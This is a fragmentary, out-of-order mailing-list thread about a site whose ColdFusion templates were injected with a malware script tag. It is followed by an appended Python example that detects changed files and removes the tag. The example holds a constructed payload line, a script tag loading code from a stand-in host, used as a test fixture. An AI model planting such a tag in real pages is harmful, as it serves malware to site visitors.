On Tuesday 15 Sep 2009, Jacob wrote:
> Format C: - Reinstall apps - restore data from backup.
Although probably OK in this case, note that malware could be hiding in the
BIOS, Intel vPro etc. etc., especially if you have been targeted specifically.
It happened to a Linux site that I maintain that runs Apache... Here's
how it happened:
Another user had the FTP credentials in Front Page (but I suspect it
could have been any "standard" Windows FTP program) and they visited a
malware site, got a virus on their machine and it found the ability
F
Can you give us some of the text that was added to each file? And
was it added to the same spot in each file (like top or bottom?) I
have a monitor that checks my website every 5 minutes for changes to
the database. I should probably add a function to compare the text
on the page and tell m
On Tue, Sep 15, 2009 at 5:31 PM, Jacob wrote:
>
> Format C: - Reinstall apps - restore data from backup.
>
> "Backup? Hmm..." ;-)
>
>
I saw this once before; it only targeted index.cfm files and was due to an
employee's computer being compromised, and did the same thing as what is happening
here. This
Format C: - Reinstall apps - restore data from backup.
"Backup? Hmm..." ;-)
-Original Message-
From: Cameron Childress [mailto:camer...@gmail.com]
Sent: Tuesday, September 15, 2009 2:06 PM
To: cf-talk
Subject: Re: HoF invaded
On Tue, Sep 15, 2009 at 1:00 PM, Michael Dinowitz
wrote:
> My own machine. If it was FTP then there would be logs.
Never assume your logs are accurate on a compromised machine.
Sorry to hear this happened - good luck with the cleanup...
-Cameron
If the MS ftp was enabled then maybe but it's not. Unless it is and it
is hidden for some reason.
On Tue, Sep 15, 2009 at 2:41 PM, Ian Skinner wrote:
>
> Michael Dinowitz wrote:
>> Somehow, every .cfm file on the HoF site has been infected with a
>> malware script tag. I'm cleaning it out now bu
Michael Dinowitz wrote:
> Somehow, every .cfm file on the HoF site has been infected with a
> malware script tag. I'm cleaning it out now but it's a bit worrisome
> as to how it got on. I'll have an update as soon as I run a cleaner
> regex against the whole site.
>
>
This does sound like a cur
Nope. I have very strong protection against that on multiple levels.
And again, if that was the case it would affect more than just public
facing cfm files.
> I suspect you have a query vulnerable to SQL injection.
>
> Paul
While this is possible via xp_cmdshell (MS SQL Server), it is unlikely
since the majority of SQLi attacks affect your data and MD stated that
the actual .cfm files themselves had the text inserted.
~Brad
Original Message
Subject: RE: HoF invaded
From: "Paul Vernon"
>> Each and every .cfm file that is on a site that is mapped to iis was
>> affected. If a .cfm was in a non-mapped directory then it was not
>> touched. This says to me that the hole is in iis.
>
> I suspect you have a query vulnerable to SQL injection.
If the attack actually caused the malware s
> Each and every .cfm file that is on a site that is mapped to iis was
> affected. If a .cfm was in a non-mapped directory then it was not
> touched. This says to me that the hole is in iis.
Unless you're running a very old version of IIS, this is highly
unlikely. You almost certainly have some s
> Each and every .cfm file that is on a site that is mapped to iis was
> affected. If a .cfm was in a non-mapped directory then it was not
> touched. This says to me that the hole is in iis.
>
I suspect you have a query vulnerable to SQL injection.
Paul
Sorry to hear about the problems on HoF. Thanks for letting us know.
I was about to post a message about HoF being flagged as a possible malware
site in google. But I see you discovered the problem already.
-Original Message-
>> From: b...@bradwood.com [mailto:b...@bradwood.com]
>> Sent: Tuesday, September 15, 2009 11:54 AM
>> To: cf-talk
>> Subject: RE: HoF invaded
>>
>>
>> Ouch. Are you on shared hosting?
>>
>> I would change every FTP passwor
Sent: Tuesday, September 15, 2009 11:54 AM
To: cf-talk
Subject: RE: HoF invaded
Ouch. Are you on shared hosting?
I would change every FTP password stat.
Good Luck.
~Brad
Original Message
Subject: HoF invaded
From: Michael Dinowitz
Date: Tue, September 15, 2009 11:46 am
To: cf-talk
and I'm in the city so it's easier
just to bring it down, fix it, and send it back up. It'll be done
soon.
On Tue, Sep 15, 2009 at 12:54 PM, wrote:
>
> Ouch. Are you on shared hosting?
>
> I would change every FTP password stat.
>
> Good Luck.
>
> ~Brad
Somehow, every .cfm file on the HoF site has been infected with a
malware script tag. I'm cleaning it out now but it's a bit worrisome
as to how it got on. I'll have an update as soon as I run a cleaner
regex against the whole site.
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
Pres
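The sweep Michael describes (a cleaner regex run over the whole site) and the periodic change check mentioned earlier in the thread, as an added Python example that is not code from the thread or from HoF. It assumes a web root of .cfm templates, a JSON baseline of SHA-256 hashes taken while the site was known clean, and a constructed payload tag on a made-up host (malware.invalid); the thread never quotes the real injected text, so the real pattern has to be built from what is actually found in the infected files.

```python
# Added example, not code from the thread or from HoF. Everything here
# (directory layout, payload text, baseline file name) is constructed.
import hashlib
import json
import os
import re
import tempfile
from pathlib import Path

# CONSTRUCTED sample of an appended malicious tag on a made-up host; the thread
# never quotes the real one, so build PAYLOAD_RE from what is actually in the files.
SAMPLE_PAYLOAD = '<script src="http://malware.invalid/x.js"></script>'

# Whole <script> element whose src is on the hostile host. Pinned to that host
# on purpose: the site's own <script> tags must survive the sweep.
PAYLOAD_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']https?://malware\.invalid/[^"\']*["\'][^>]*>'
    r'\s*</script\s*>',
    re.IGNORECASE | re.DOTALL,
)
TEMPLATE_SUFFIXES = (".cfm",)


def sha256_file(path: Path) -> str:
    """Hex SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def templates(root: Path):
    """Every .cfm file under root, in a stable order."""
    return [p for p in sorted(root.rglob("*"))
            if p.is_file() and p.suffix.lower() in TEMPLATE_SUFFIXES]


def snapshot(root: Path) -> dict:
    """Relative POSIX path -> SHA-256 for every template under root."""
    return {p.relative_to(root).as_posix(): sha256_file(p) for p in templates(root)}


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Files whose hash changed, plus files that appeared or vanished since the baseline."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def clean_file(path: Path, pattern: re.Pattern = PAYLOAD_RE) -> int:
    """Strip every match of pattern from one file; returns how many were removed.
    Writes to a temp file beside the original and renames over it, so an
    interrupted run never leaves a half-written template."""
    text = path.read_bytes().decode("utf-8", errors="surrogateescape")
    cleaned, n = pattern.subn("", text)
    if n:
        fd, tmp = tempfile.mkstemp(dir=path.parent, prefix=path.name + ".")
        with os.fdopen(fd, "wb") as f:
            f.write(cleaned.encode("utf-8", errors="surrogateescape"))
        os.replace(tmp, path)
    return n


def sweep(root: Path, pattern: re.Pattern = PAYLOAD_RE) -> dict:
    """clean_file over the whole tree; {relative path: removed count} for files that changed."""
    hits = {}
    for p in templates(root):
        n = clean_file(p, pattern)
        if n:
            hits[p.relative_to(root).as_posix()] = n
    return hits


def demo() -> dict:
    """Constructed walk-through: clean tree -> baseline -> mass injection -> detect -> sweep."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "inc").mkdir()
        pages = {  # constructed site content
            "index.cfm": "<cfset x = 1><html><body>Hi <script>var ok=1;</script></body></html>",
            "inc/header.cfm": "<cfoutput>#now()#</cfoutput>",
            "inc/footer.cfm": '<cfinclude template="nav.cfm">',
        }
        for rel, body in pages.items():
            (root / rel).write_text(body, encoding="utf-8")
        baseline_file = root / "baseline.json"  # in production keep this off the web server
        baseline_file.write_text(json.dumps(snapshot(root)))

        # Simulate the incident: the tag is appended to two of the three templates.
        for rel in ("index.cfm", "inc/header.cfm"):
            with (root / rel).open("a", encoding="utf-8") as f:
                f.write(SAMPLE_PAYLOAD)

        baseline = json.loads(baseline_file.read_text())
        detected = diff_snapshots(baseline, snapshot(root))
        removed = sweep(root)
        after = diff_snapshots(baseline, snapshot(root))
        own_script_kept = "var ok=1" in (root / "index.cfm").read_text(encoding="utf-8")
        return {"detected": detected, "removed": removed, "after": after,
                "own_script_kept": own_script_kept}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The pattern is pinned to the hostile host so the site's own script tags survive the sweep; a pattern that strips every script element would break pages. Keep the baseline off the web server: as Cameron notes, nothing on a compromised box (logs or hash lists included) can be trusted. Cleaning the files also does not address how they were written; the FTP credentials and the workstation that held them still need dealing with.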